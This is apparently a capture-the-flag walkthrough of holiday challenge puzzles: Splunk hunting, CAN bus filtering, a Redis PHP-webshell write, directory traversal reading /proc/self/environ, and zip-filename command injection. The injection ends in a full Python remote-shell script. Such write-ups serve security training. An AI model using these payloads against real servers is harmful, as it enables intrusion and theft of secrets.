OSTAP is a javascript downloader (dropper) employed to get secondary malware into a system. Alice gives a big hint, pointing out that Splunk attack range keeps track of the simulations that are run in an index called attack. The search

index=attack ostap | sort _time

finds 5 occurences of the keyword OSTAP in the attack index and sorts them by time. The UTC timestamp can be extracted by selecting Execution Time _UTC from the list of selected fields left of the search results.

The answer is the first entry, 2020-11-30T17:44:15Z

Question 5:

One Atomic Red Team test executed by the Attack Range makes use of an open source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?

The hints become sparse now: Alice just talks of "some pivoting". Quite some ballet class this is ... The first step is to identify the open source package. On frgnca's github page the list of repositories shows one likely candidate, AudioDeviceCmdlets, a suite of PowerShell commandlets to control audio devices on Windows.

The first pivot leads to the Atomic Red Team site, where a keyword search of the repository for "AudioDeviceCmdlets" identifies the Audio Capture technique T1123. This is indeed one of the techniques Alice emulated (question 1). It contains one atomic test, which employs a powershell command

powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet

Time for the second pivot: a keyword search of the T1123 index family in Splunk for this PS command gives 7 hits, and a refinement looking for a process creation Sysmon event (EventID = 1) leaves 2:

index=t1123* "WindowsAudioDevice-Powershell-Cmdlet" EventID=1

Those two events were logged at exactly the same time, so one is probably a subprocess of the other. To clarify, lets show them as table:

index=t1123* "WindowsAudioDevice-Powershell-Cmdlet" EventID=1 | table _time ProcessId parent_process_id CommandLine

This identifies the process with ProcessId 3648 as parent process.

Question 6:

Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?

Searching for the keyword "registry run key" in Atomic-Red-Team brings up two techniques, T1112 and T1547.001, but only T1547.001 appears in the list of techniques employed by Alice from question 1.

At this point it is very easy to get led down a garden path and waste a lot of time. There is an obvious target batstartup.bat which is employed in test #6 (Suspicious bat file run from startup Folder), and one can spend a long time chasing it in splunk only to realize

The contents of the bat file are not (as far as I can tell) visible in splunk. One has to go to the origin, Atomic-Red-Team. Once actually found, that bat file turns out to be a one-liner.

A red herring. It pays off being diligent here ... searching the page T1547.001.md for ".bat" yields a hidden champion in test #3 together with full path:

https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/ Discovery.bat

A splunk search verifies that this file appears in 14 different indexes representing all 13 attack techniques emulated by Alice. Checking the source of Discovery.bat shows 44 lines, the last of which is quser .

Question 7:

According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?

Zeek is an open-source network analysis framework, and Alice hints that events captured by Zeek can be found by looking for its old name bro:

index=* sourcetype=bro*

As it stands, this catches 30195 events which is less than helpful. Checking the sourcetypes under interesting fields shows 10 distinct values:

The sourcetype related to X.509 (a standard defining the format of public key certificates) is bro:x509:json, and looking for that nets 2722 certificate related events.

index=* sourcetype=bro:x509:json

The selected fields list on the left shows that only 12 different certificate subjects appear, the most common being the windows domain controller win-dc-748.attackrange.local

index=* sourcetype=bro:x509:json "certificate.subject"="CN=win-dc-748.attackrange.local"

Clicking on that to refine the search still gives 1288 events, but only one value for certificate.serial, namely 55FCEEBB21270D9249E86F4B9DC7AA60 .

Challenge question:

What is the name of the adversary group that Santa feared would attack KringleCon?

Alice Bluebird: This last one is encrypted using your favorite phrase! The base64 encoded ciphertext is: 7FXjP1lyfKbyDK/MChyf36h7 . It's encrypted with an old algorithm that uses a key. We don't care about RFC 7465 up here! I leave it to the elves to determine which one!

The old algorithm must be the stream cipher RC4, because RFC 7465 (from 2015) prohibits its usage in TLS due to its serious security flaws. Despite its flaws, it is still a very hard cipher to break, so Santa needs to jog his memory what his favourite phrase is. According to Bubble Lightington in the courtyard (when spoken to as Santa), this is currently "Stay frosty" (what a surprise). Using Cyberchef to decrypt fails at first, and when asked, Alice replies "I can't believe the Splunk folks put it in their talk!". Checking the talk reveals the cause of failure: At the end of the talk, this phrase is shown with different capitalisation: "Stay Frosty". This works as key, and the decrypted plaintext is

The Lollipop Guild

Terminal 7: CAN-bus investigation

Wunorse Openslae: Hiya hiya - I'm Wunorse Openslae! I've been playing a bit with CAN bus. Are you a car hacker? I'd love it if you could take a look at this terminal for me. I'm trying to figure out what the unlock code is in this CAN bus log. When it was grabbing this traffic, I locked, unlocked, and locked the doors one more time. It ought to be a simple matter of just filtering out the noise until we get down to those three actions. Need more of a nudge? Check out Chris Elgee's talk on CAN traffic!

⟶ Talk by Chris Elgee about CAN traffic.

⟶ You can hide lines you don't want to see with commands like

cat file.txt | grep -v badstuff

The CAN bus (as in tin can?) is an in-car data bus over which the different car components communicate. It usually has an accessible port (ODB-II) where a technician can check what is going on. The file candump.log contains the log of some of the traffic on the CAN bus of Santa's sleigh. A lovely image: Santa with his head under the hood of his beloved sleigh, beard grimy with engine oil ...

Well, back to "reality". To see what the log looks like:

~$ wc -l candump.log 1369 candump.log~$ head -n 5 candump.log (1608926660.800530) vcan0 244#0000000116(1608926660.812774) vcan0 244#00000001D3(1608926660.826327) vcan0 244#00000001A6(1608926660.839338) vcan0 244#00000001A3(1608926660.852786) vcan0 244#00000001B4

1369 very similar looking lines, with pattern ([timestamp]) vcan0 [CAN ID]#[reading] . The CAN ID 0x244 is the most common and probably represents engine readings. Filtering it leaves 38 entries with two IDs:

~$ cat candump.log | grep -cv '244#' 38~$ cat candump.log | grep -v '244#' (1608926660.970738) vcan0 188#00000000 ...(1608926663.989726) vcan0 188#00000000(1608926664.491259) vcan0 188#00000000(1608926664.626448) vcan0 19B #000000000000(1608926664.996093) vcan0 188#00000000 ...(1608926671.055065) vcan0 188#00000000(1608926671.122520) vcan0 19B #00000F000000(1608926671.558329) vcan0 188#00000000 ...(1608926674.086447) vcan0 188#00000000(1608926674.092148) vcan0 19B #000000000000(1608926674.589954) vcan0 188#00000000 ...

CAN ID 0x188 shows no variation and appears uninteresting, which leaves 0x19B for the door events. The sequence was LOCK, UNLOCK, LOCK and so the desired entry is the middle one, with timestamp 1608926671. 122520 . Submitting the decimal part to ./runtoanswer completes the investigation and prompts Wunorse for some hints on the much more serious issue of the CAN-D bus.

Objective 7: Solve the Sleigh's CAN-D-BUS Problem

Difficulty: 3

Jack Frost is somehow inserting malicious messages onto the sleigh's CAN-D bus. We need you to exclude the malicious messages and no others to fix the sleigh. isit the NetWars room on the roof and talk to Wunorse Openslae for hints.

Wunorse Openslae: Great work! You found the code! I wonder if I can use this knowledge to work out some kind of universal unlocker... ... to be used only with permission, of course! Say, do you have any thoughts on what might fix Santa's sleigh? Turns out: Santa's sleigh uses a variation of CAN bus that we call CAN-D bus. And there's something naughty going on in that CAN-D bus. The brakes seem to shudder when I put some pressure on them, and the doors are acting oddly. I'm pretty sure we need to filter out naughty CAN-D-ID codes. There might even be some valid IDs with invalid data bytes. For security reasons, only Santa is allowed access to the sled and its CAN-D bus. I'll hit him up next time he's nearby.

Oh dear, Jack has messed with Santas ride. The cockpit offers controls to lock and unlock the doors, start and stop the engine, accelerate, brake and steer. Events on the CAN-D bus are also protocolled, but scroll past too fast to be of immediate help. Finally, a filter panel permits the exclusion of selected bus events.

The cockpit is controlled by and communicates with the CAN-D bus via web socket. One can observe the web socket by using the browser developer tools, but it is probably simplest to take some screenshots in order to identify the CAN-D-IDs appearing. To find out what one ID does, all other IDs can be filtered out in the exclusion filter panel. Playing around a bit reveals 6 different CAN-D-IDs. Starting with the least frequent:

02A#: Ignition

The messages all appear legitimate

00FF00 : Start button pressed

: Start button pressed 0000FF : Stop button pressed

19B#: Door

Three different messages can be observed

00000F000000 : Unlock button pressed

: Unlock button pressed 000000000000 : Lock button pressed

: Lock button pressed 0000000F2057 : Rogue code appearing sporadically

This would explain why the doors are behaving oddly. The rogue messages should be excluded

019#: Steering

The messages appear roughly in 400 ms intervals and reflect the steering slider in the cockpit. There is a very small fluctuation, which is to be expected in a real sleigh. The messages appear legitimate.

FFFFFFCE : Steering at -50

: Steering at -50 00000032 : Steering at 50

080#: Brake

While the brake is not applied, 000000 messages appear roughly every 400 ms. However, when the prake is applied, something strange happens. In between the regular messages reflecting the brake setting, negative values are injected. This explains the shuddering of the brakes and should be filtered,

000000 - 000064 : Brake between 0 and 100

: Brake between 0 and 100 FFFFF0 - FFFFFF : Rogue values appearing between regular ones

244#: Engine cycles (RPM)

As before, messages appear every 400 ms and reflect the RPM reading, ranging from idling around 1000 unp to speeding in the red zone. The messages all look legitimate.

0000000000 : Engine switched off

: Engine switched off 00000003DE - 00000003EF : Engine idling

: Engine idling 00000022F0 - 000000237F : Santa is joyriding and wrecking his sleigh

188#: ???

This ID remains a mystery. It comes at a 400 ms heartbeet and its value never seems to change from 00000000 . Probably some diagnostic; it seems safe to leave this alone

Defrosting

Two filter rules are enough to get all the CAN-D-bus traffic back to nice:

19B Equals F2057

080 Less 00

This leaves the sleigh deFrosted, and Santa can ride again!

Terminal 8: Redis Bug Hunt

Holly Evergreen: Hi, so glad to see you! I'm Holly Evergreen. I've been working with this Redis-based terminal here. We're quite sure there's a bug in it, but we haven't caught it yet. The maintenance port is available for curling, if you'd like to investigate. Can you check the source of the index.php page and look for the bug? I read something online recently about remote code execution on Redis. That might help! I think I got close to RCE, but I get mixed up between commas and plusses. You'll figure it out, I'm sure!

⟶ This is kind of what we're trying to do... Pentesting Redis

I) Finding index.php

Apparently there is a bug in index.php. Accessing the page via HTTP

~$ curl http://localhost/index.php Something is wrong with this page! Please use http://localhost/maintenance.php to see if you can figure out what's going on.

doesn't help much, because we can't see any PHP content this way. We need to find out where in the directory tree this file is located, and to do that, we need to identify the web server in use and where its document root is configured to be.

~$ ps -ef UID PID PPID C STIME TTY TIME CMDroot 1 0 0 12:57 pts/0 00:00:00 /bin/bash /sbin/entrypoint.shroot 6 1 0 12:57 pts/0 00:00:00 /usr/bin/ redis-server 127.0.0.1:6379root 29 1 0 12:57 ? 00:00:00 /usr/sbin/ apache2 -k startwww-data 33 29 0 12:57 ? 00:00:00 /usr/sbin/apache2 -k startwww-data 34 29 0 12:57 ? 00:00:00 /usr/sbin/apache2 -k startwww-data 35 29 0 12:57 ? 00:00:00 /usr/sbin/apache2 -k startwww-data 36 29 0 12:57 ? 00:00:00 /usr/sbin/apache2 -k startwww-data 37 29 0 12:57 ? 00:00:00 /usr/sbin/apache2 -k startroot 47 1 0 12:57 pts/0 00:00:00 sudo -i -u playerplayer 48 47 0 12:57 pts/0 00:00:00 -bashplayer 53 48 0 13:02 pts/0 00:00:00 ps -ef~$ grep -i 'DocumentRoot' /etc/apache2/sites-enabled/000-default.conf DocumentRoot /var/www/html ~$ ls /var/www/html ls: cannot open directory '/var/www/html': Permission denied

An apache2 process is running, so that must be the web server, and for Ubuntu/Debian the configuration file in which document root is defined is /etc/apache2/sites-enabled/000-default.conf . It turns out that the default location is used, /var/www/html. Which is, of course, not readable. We need to find a way to escalate privileges. This is where the other running process, redis-server, comes into play.

II) Finding the Redis CLI password

Redis is an "open source in-memory data structure store", a bit of a mouthful. It can be seen as a key-value database residing in memory while operating for the sake of efficiency, which is dumped to file only for storage. This is vulnerable to exploitation as described in the "pentesting Redis" hint above, and we can try to use this method to execute commands with sufficient privilege to get our dirty hands on index.php. First, though, we have to gain access to Redis. The usual way is through the command line interface redis-cli , and by default no credentials are required. No such luck here:

~$ redis-cli info NOAUTH Authentication required.

However, as pointed out in the introduction and in index.php, Redis is currently in maintenance mode, and there is a convenient web-based maintenance page maintenance.php with preconfigured access credentials. This page can run any Redis command as comma seperated list:

curl http://localhost/maintenance.php?cmd=[redis command],[param 1],[param2] ...

and therefore could be used directly to execute our exploit. This is a bit cumbersome, though. A more satisfying approach is to pull the credentials from the configuration parameters in order to use the interactive CLI:

~$ curl http://localhost/maintenance.php ERROR: 'cmd' argument required (use commas to separate commands); eg:curl http://localhost/maintenance.php?cmd=helpcurl http://localhost/maintenance.php?cmd=mget,example1~$ curl http://localhost/maintenance.php?cmd=config,get,* Running: redis-cli --raw -a '<password censored>' 'config' 'get' '*'dbfilenamedump.rdbrequirepass R3disp@ss masterauth ... and much more ...

With this password, an authenticated, interactive redis-cli session can be started.

III) Abusing Redis to read index.php

Let's find out what we are dealing with and gather information about the current database.

~$ redis-cli -a R3disp@ss Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.127.0.0.1:6379> info keyspace # Keyspace db0:keys=2,expires=0,avg_ttl=0127.0.0.1:6379> keys * 1) "example2" 2) "example1"127.0.0.1:6379> mget example1 example2 1) "The site is in maintenance mode" 2) "We think there's a bug in index.php"

Nothing overly interesting here at all: one database with two keys.

The RCE exploit for Redis works by changing the database dump directory to the document root /var/www/html of the web server, and setting the name of the dump to [something].php. The dump file will contain binary content, but keys and their data are uncompressed ASCII and therefore readable. If the dump is successful, then any PHP commands injected into it will be executed with web server privileges whenever someone reads the dump file via HTTP: to the web server, it is legitimate, though somewhat dirty PHP. As payload, we use

<?php copy('index.php', 'index.txt'); ?>

This defuses the PHP content in the eyes of the web server. Afterwards, accessing index.txt via curl will show the whole file rather than executing it. Using the instructions from the RCE exploit:

127.0.0.1:6379> config set dir /var/www/html OK127.0.0.1:6379> config set dbfilename executable_dump.php OK127.0.0.1:6379> set test "<?php copy('index.php', 'index.txt'); ?>" OK127.0.0.1:6379> save OK127.0.0.1:6379> quit ~$ curl -o - http://localhost/executable_dump.php REDIS0009� redis-ver5.0.3��edis-bits�@�ctime¢��_used-mem aof-preamble��� test (example1The site is in maintenance modeexample2#We think there's a bug in index.php������f ~$ curl http://localhost/index.txt <?php# We found the bug!!# # \ / # .\-/. # /\ () () # \/~---~\.-~^-. # .-~^-./ | \---. # { | } \ # .-~\ | /~-. # / \ A / \ # \/ \/ # echo "Something is wrong with this page! Please use http://localhost/maintenance.php to see if you can figure out what's going on"?>

The PHP payload was executed blindly, index.txt was created as planned, and in it the bug showed its hideous face. Note: the curl option -o - was used to force output to stdout despite the binary content.

Objective 8: Broken Tag Generator

Difficulty: 4

Help Noel Boetie fix the Tag Generator in the Wrapping Room. What value is in the environment variable GREETZ? Talk to Holly Evergreen in the kitchen for help with this.

Noel Boetie (as Santa): Welcome to the Wrapping Room, Santa! The tag generator is acting up. I feel like the issue has something to do with weird files being uploaded. Can you help me figure out what's wrong? Holly Evergreen: I wonder, could we figure out the problem with the Tag Generator if we can get the source code? Can you figure out the path to the script? I've discovered that enumerating all endpoints is a really good idea to understand an application's functionality. Sometimes I find the Content-Type header hinders the browser more than it helps. If you find a way to execute code blindly, maybe you can redirect to a file then download that file?

⟶ We might be able to find the problem if we can get source code! Can you figure out the path to the script? It's probably on error pages!

⟶ Once you know the path to the file, we need a way to download it! Is there an endpoint that will print arbitrary files? If you're having trouble seeing the code, watch out for the Content-Type! Your browser might be trying to help (badly)!

⟶ I'm sure there's a vulnerability in the source somewhere... surely Jack wouldn't leave their mark? If you find a way to execute code blindly, I bet you can redirect to a file then download that file! Remember, the processing happens in the background so you might need to wait a bit after exploiting but before grabbing the output!

I) Directory traversal: getting the source code

The Tag Generator at https://tag-generator.kringlecastle.com/ is misbehaving and requires fixing. And the culprit is not shy: Jack Frost is all over the central template (which looks kind of cute actually). What has he done this time? Though not overly useful, a similar application without security issues can be accessed in the Netwars room next to Chimney Scissorsticks: the Greeting Card Generator.

The app functions are almost exclusively on the client side, even the save and clear buttons, which can be verified by checking the JS script governing client behaviour: app.js. The one notable exception is the input file button (lines 316 - 361 in app.js), which invites the user to select several images and then uploads them to the server via a multipart POST /upload request. If the operation is successful, it returns a list of random looking IDs or handles for the uploaded images. In subsequent GET /image requests, those IDs are passed as parameters to download adapted versions of those images from the server, for inclusion in the tag.

This HTTP exchange can be observed with an intercepting proxy (burp, ZAP) or simply through the browser tools, but doesn't reveal much by itself. To find out more and discover weak points, it is often helpful to provide unexpected or unwanted input, hoping to trigger revealing error messages. For example, uploading a text file instead of an image file causes the error:

which tells us that the web application is written in Ruby, with source at /app/lib/app.rb. It also shows that the directory /tmp is probably used to store uploaded image files.

Let's try to exploit this knowledge. The most likely candidate for abuse is the image retrival request from above, which turns out to have a directory traversal weakness. As verification, the two requests

GET https://tag-generator.kringlecastle.com/ image?id= 903012a7-fbf9-4568-8fd8-9e3335a54b41.pngGET https://tag-generator.kringlecastle.com/ image?id= ../tmp/ 903012a7-fbf9-4568-8fd8-9e3335a54b41.png

both return the uploaded image. Trying to exploit this immediately from the browser fails, though: The request

GET https://tag-generator.kringlecastle.com/ image?id= ../app/lib/app.rb

just results in a message stating that the image contains errors and cannot be shown. The culprit is a Content header in the reply:

Connection: keep-aliveContent-Length: 81Content-Type: image/jpeg Date: Tue, 05 Jan 2021 21:42:17 GMTServer: nginx/1.14.2X-Content-Type-Options: nosniff

Content type image/jpeg tells the browser that the payload should be an image, and nosniff forbids it use better knowledge. So, the payload is there, but the browser finds it not to have correct type and refuses to show it. B******d! Luckily there are the command line tools curl (linux) and iwr (powershell) which are not emburdened by such moral constraints:

( iwr https://tag-generator.kringlecastle.com//image?id=.. /app/lib/app.rb ). RawContent

returns the web app sourece code without further trouble (RawContent avoids undue parsing).

II) Access to environment variables

We are supposed to look at the source now to find another exploit. This is certainly the more elegant, dutiful and generally nice way of doing things, but also turns out to be quite hard for the uninitiated (it certainly took me a long time). There is a much simpler way to get to the environment variables, though.

In Linux, everything is (a bit like) a file, including environment variables. The proc filesystem is a special filesystem giving access to process related data for all running processes, generally readable for all. In particular, the environment variables for process ID <pid> can be found in /proc/<pid>/environ . Nice, but with the slight flaw that we do not know the process ID of the web server. /proc/self comes to the rescue: it holds a symbolic link to the current process (from which the request is made), i.e. the web server. Accessing this with our directory traversal tool

(iwr https://tag-generator.kringlecastle.com//image?id=.. /proc/self/environ ).RawContent PATH=/usr/local/bundle/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin HOSTNAME=cbf2810b7573 RUBY_MAJOR=2.7 RUBY_VERSION=2.7.0RUBY_DOWNLOAD_SHA256=27d350a52a02b53034ca0794efe518667d558f152656c2baaf08f3d0c8b02343GEM_HOME=/usr/local/bundle BUNDLE_SILENCE_ROOT_WARNING=1 BUNDLE_APP_CONFIG=/usr/local/bundleAPP_HOME=/app PORT=4141 HOST=0.0.0.0 GREETZ=JackFrostWasHere HOME=/home/app

dumps the process environment variables including a friendly greeting by our hero, completing the objective.

III) Weak points in the source code: RFI

The direct approach of solving the challenge is fast, but a little dissatisfying. There is fun to be had beyond mere environment variables. The code in app.rb is based on Sinatra, a simple web application framework with a focus on quick and easy app creation. Unlike the filename/directory approach found in PHP-based web servers, Sinatra uses routes to determine what is to be done with a request. All available routes are defined in app.rb within the module TagGenerator. As an overview:

Curiously, the routes /share, /save and /clear are not actually used by the tag generator. The directory traversal weakness exploited in part I) is caused by a modification Jack made to the /image route, removing parameter filtering:

get '/image' do if !params['id'] raise 'ID is missing!' end # Validation is boring! --Jack # if params['id'] !~ /^[a-zA-Z0-9._-]+$/ # return 400, 'Invalid id! id may contain letters, numbers, period, underscore, and hyphen' # end content_type 'image/jpeg' filename = "#{ FINAL_FOLDER }/#{ params['id'] }" if File.exists?(filename) return File.read(filename) else return 404, "Image not found!" endend

The code behind the /upload route is the most elaborate. The multipart data content of the POST request is passed part by part to the function process_file(), which decides how to handle it based on the filename extension:

def process_file(filename) out_files = [] if filename.downcase.end_with?(' zip ') # Append the list returned by handle_zip out_files += handle_zip(filename) elsif filename.downcase.end_with?(' jpg ') || filename.downcase.end_with?(' jpeg ') || filename.downcase.end_with?(' png ') # Append the name returned by handle_image out_files << handle_image(filename) else raise "Unsupported file type: #{ filename }" end return out_filesend

In addition to the image formats jpeg, jpg and png, it turns out that zip files are supported. Any other filetype causes the whole upload to abort. Jack has been active again in the zip file handler:

def handle_zip(filename) LOGGER.debug("Processing #{ filename } as a zip") out_files = [] Zip::File.open(filename) do |zip_file| # Handle entries one by one zip_file.each do |entry| LOGGER.debug("Extracting #{entry.name}") if entry.size > MAX_SIZE raise 'File too large when extracted' end if entry.name().end_with?('zip') raise 'Nested zip files are not supported!' end # I wonder what this will do? --Jack # if entry.name !~ /^[a-zA-Z0-9._-]+$/ # raise 'Invalid filename! Filenames may contain letters, numbers, period, underscore, and hyphen' # end # We want to extract into TMP_FOLDER out_file = "#{ TMP_FOLDER }/#{ entry.name }" # Extract to file or directory based on name in the archive entry.extract(out_file) { # If the file exists, simply overwrite true } # Process it out_files << process_file(out_file) end end return out_filesend

This is interesting. Jack's modification removed filename validation within the zip archive, and the archive contents are extracted to /tmp based on their names! If those names contain backslashes, directories can be traversed again. We have a remote file inclusion weakness permitting arbitrary files to be written anywhere ... as long as we have write permission. Which is a pity, because it turns out we don't. as far as I could tell, no outside of /tmp are writable with the privileges we have. In particular, the web application space /app/lib and below is protected, which is probably a good thing, but means that no havoc can be wreaked by, for example, overwriting templates. A nice start, but no solution yet.

IV) Remote code execution

The third, crucial weakness enabling remote code execution is hidden within the image handler called from process_file(). Many thanks to joergen for removing my blind spot here!! A system call is made to invoke convert, which is part of the ImageMagick package and which is used here to resize the image and adapt its compression level. One of its arguments is the unfiltered filename ... a recipe for disaster.

def handle_image(filename) out_filename = "#{ SecureRandom.uuid }#{File.extname(filename).downcase}" out_path = "#{ FINAL_FOLDER }/#{ out_filename }" # Resize and compress in the background Thread.new do if ! system ("convert -resize 800x600\\> -quality 75 '#{ filename }' '#{ out_path }'") LOGGER.error("Something went wrong with file conversion: #{ filename }") else LOGGER.debug("File successfully converted: #{ filename }") end end # Return just the filename - we can figure that out later return out_filenameend

To exploit this, we need filename to close the open quote and then chain whichever shell command we need executed. A hash follows to make the rest of the line look like a comment. In particular, the hanging closing quote is not seen by the shell, avoiding a nasty error. As a useful example,

filename = ';ls -l >kuraout 2>&1 #png

causes a listing of the current directory ( /tmp ) to be written to the file /tmp/kuraout , which can then be read using the directory traversal exploit from part I) and which turns out to be quite the message board. For good measure, the error output is redirected to the same output file.

Some of the characters in the filename cause problems when trying to upload: depending on the client operating system, they may be illegal, and they may be escaped when the POST request is built. Both issues can be avoided by using a zip archive as container: filenames can be edited within the archive and are not checked for being legal there. To get our hands on the environment variables, we therefore need to:

Create a ZIP archive containing one dummy entry rename this dummy entry to ';env >kuraout 2>&1 #png upload this ZIP archive to the server with the file selection button read the output file using e.g.

(iwr "https://tag-generator.kringlecastle.com/image?id=kuraout").RawContent

V) Odds and ends

The method above permits the execution of any code, provided there are no backslashes in it. The reason for this restriction is handle_zip(), which attempts to write to the filename carrying the exploit. Backslashes imply subdirectories, and if these don't exist, an exception is caused. A way around is to encode the offending command in base64. For example, ls -l /app/lib encodes to bHMgLWwgL2FwcC9saWI= , and

filename = ';echo bHMgLWwgL2FwcC9saWIvcHVibGlj | base64 -d | sh >kuraout 2>&1 #png

shows the contents of /app/lib .

Another issue might be the convert command in handle_image(), which is left incomplete and fails with the exploit, leaving an irritating error log. A more stealthy approach would be to include two files in the zip archive: a real immage, followed by a dummy carrying an extended exploit.

No errors are generated, and the image download also works as it should.

Finally, here is a little script to take the pain out of the RCE exploit. The script acts a bit like a shell: it waits for the input of commands and feeds them through the RCE process, printing the result, until "exit" is encountered. It also keeps track of current directory by using a secondary output file kurapwd .

#!/usr/bin/env python3import requestsfrom zipfile import ZipFilefrom io import BytesIOimport base64def make_payload(exploit): # create a zip file containing a dummy file with the exploit as filename mypayload = BytesIO() with ZipFile(mypayload, 'w') as zf: file_name = exploit zf.writestr(file_name, 'I am a dummy') mypayload.seek(0) # reset byte stream to position 0 return mypayloadurl = "https://tag-generator.kringlecastle.com"current_dir = "/tmp"while True: # wait for input, showing current directory line = input(f"{current_dir}$ ").strip() if line.lower() == 'exit': break # base64 encode command to hide . and / b64 = base64.b64encode(f"cd {current_dir}; {line} >/tmp/kuraout 2>&1; pwd >/tmp/kurapwd".encode()).decode() payload = make_payload(f"';echo {b64} | base64 -d | sh #png") # generate the POST request carrying the payload requests.post(url + "/upload", files={'my_file[]': ("innocent.zip", payload)}) # get the output through directory traversal exploit get_resp = requests.get(url + "/image?id=kuraout") print(get_resp.text) # retrieve the new current directory pwd_resp = requests.get(url + "/image?id=kurapwd") current_dir = pwd_resp.text.strip()

Terminal 9: ScaPy Packet Prepper

Alabaster Snowball: Welcome to the roof! Alabaster Snowball here. I'm watching some elves play NetWars! Feel free to try out our Scapy Present Packet Prepper! If you get stuck, you can help() to see how to get tasks and hints.

scapy is a packet manipulation tool in python, able to forge and decode packets, send them on the wire, capture them, and match requests and replies. It can also handle tasks such as scanning, tracerouting, probing, unit tests, attacks, and network discovery. This prepper introduces scapy through a series of questions in a controlled python command line environment which is already set up for scapy. Some useful resources:

⟶ Functions and classes to send, receive or sniff packets.

⟶ Scapy utilities

⟶ Creating packets with scapy

Below a protocol of the questions from the prepper and the answers required to pass the challenge:

Start by running the task.submit() function passing in a string argument of 'start'. task.submit("start") Submit the class object of the scapy module that sends packets at layer 3 of the OSI model. task.submit(send) Note: The sendp scapy class is used to send packets at layer 2 of the OSI model. Submit the class object of the scapy module that sniffs network packets and returns those packets in a list. task.submit(sniff) Note: Here is a thorough explanation of sniffing session Submit the choice that would successfully send a TCP packet and then return the first sniffed response packet to be stored in a variable named "pkt": sr1(IP(dst="127.0.0.1")/TCP(dport=20)) sniff(IP(dst="127.0.0.1")/TCP(dport=20)) sendp(IP(dst="127.0.0.1")/TCP(dport=20)) task.submit(1) Submit the class object of the scapy module that can read pcap or pcapng files and return a list of packets. task.submit(rdpcap) Note: rdpcap is part of the scapy utilities The variable UDP_PACKETS contains a list of UDP packets. Submit the choice that correctly prints a summary of UDP_PACKETS: UDP_PACKETS.print() UDP_PACKETS.show() UDP_PACKETS.list() task.submit(2) Note: This variable actually exists, so the different choices can be tried out in the prepper. .show() can be used on lists of packets AND on an individual packet. Submit only the first packet found in UDP_PACKETS. task.submit(UDP_PACKETS[0]) Submit only the entire TCP layer of the second packet in TCP_PACKETS. task.submit(TCP_PACKETS[1][TCP]) Note: Substructures of packets can be accessed just like cascaded dictionaries Change the source IP address of the first packet found in UDP_PACKETS to 127.0.0.1 and then submit this modified packet pkt = UDP_PACKETS[0] pkt[IP].src = '127.0.0.1' task.submit(pkt) Submit the password of the user alabaster as found in the packet list TCP_PACKETS. [pkt[Raw].load for pkt in TCP_PACKETS if Raw in pkt] [b'220 North Pole FTP Server\r

', b'USER alabaster\r', b'331 Password required for alabaster.\r', b'PASS echo\r

', b'230 User alabaster logged in.\r'] task.submit('echo') Note: See packet list summary with TCP_PACKETS.show() The ICMP_PACKETS variable contains a packet list of several icmp echo-request and icmp echo-reply packets. Submit only the ICMP chksum value from the second packet in the ICMP_PACKETS list. task.submit(ICMP_PACKETS[1][ICMP].chksum) Submit the choice that would correctly create a ICMP echo request packet with a destination IP of 127.0.0.1 stored in the variable named "pkt" pkt = Ether(src='127.0.0.1')/ICMP(type="echo-request") pkt = IP(src='127.0.0.1')/ICMP(type="echo-reply") pkt = IP(dst='127.0.0.1')/ICMP(type="echo-request") task.submit(3) Create and then submit a UDP packet with a dport of 5000 and a dst IP of 127.127.127.127. (all other packet attributes can be unspecified) pkt = IP(dst='127.127.127.127')/UDP(dport=5000) task.submit(pkt) Create and then submit a UDP packet with a dport of 53, a dst IP of 127.2.3.4, and is a DNS query with a qname of "elveslove.santa". pkt = IP(dst="127.2.3.4")/UDP(dport=53)/DNS(opcode='QUERY', qd=DNSQR(qname="elveslove.santa")) task.submit(pkt) The variable ARP_PACKETS contains an ARP request and response packets. The ARP response (the second packet) has 3 incorrect fields in the ARP layer. Correct the second packet in ARP_PACKETS to be a proper ARP response and then task.submit(ARP_PACKETS) for inspection. ARP_PACKETS[1][ARP].op = 2ARP_PACKETS[1][ARP].hwsrc = ARP_PACKETS[1][Ether].srcARP_PACKETS[1][ARP].hwdst = ARP_PACKETS[1][Ether].dst task.submit(ARP_PACKETS) Note: op should be ARP-reply (2), and source and destination MAC addresses must also have values consistent with the Ethernet layer.

When the dust has settles, an impressed Alabaster gives some valuable hints for objective 9.

Objective 9: ARP Shenanigans

Difficulty: 4

Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?

Alabaster Snowball: Those skills might be useful to you later on! I've been trying those skills out myself on this other terminal. I'm pretty sure I can use tcpdump to sniff some packets. Then I'm going to try a machine-in-the-middle attack. Next, I'll spoof a DNS response to point the host to my terminal. Then I want to respond to its HTTP request with something I'll cook up. I'm almost there, but I can't quite get it. I could use some help! For privacy reasons though, I can't let you access this other terminal. I do plan to ask Santa for a hand with it next time he's nearby, though. as Santa: Oh, I see the Scapy Present Packet Prepper has already been completed! Now you can help me get access to this machine. It seems that some interloper here at the North Pole has taken control of the host. We need to regain access to some important documents associated with Kringle Castle. Maybe we should try a machine-in-the-middle attack? That could give us access to manipulate DNS responses. But we'll still need to cook up something to change the HTTP response. I'm sure glad you're here Santa.

Alabaster is in trouble, and only Santa can help. So we need to slip into Santas britches again in order to help the big man show Jack Frost who is wearing the britches at the North Pole (or something like that).

I) Sniffy

Jack Frost must have gotten malware on our host at 10.6.6.35 because we can no longer access it. Try sniffing the eth0 interface using tcpdump -nni eth0 to see if you can view any traffic from that host.

⟶ Tmux cheatsheet and quick guide.

The terminal is a Tmux set up with three initial panes, which presents the first challenge to the uninitiated. Pepper Minstix' training session in the unescape Tmux terminal challenge comes in handy here. Further hints can be found in the HELP.md file within the guest folder. Let's get started:

Jack Frost has hijacked the host at 10.6.6.35 with some custom malware. Help the North Pole by getting command line access back to this host. Read the HELP.md file for information to help you in this endeavor. Note: The terminal lifetime expires after 30 or more minutes so be sure to copy off any essential work you have done as you go.

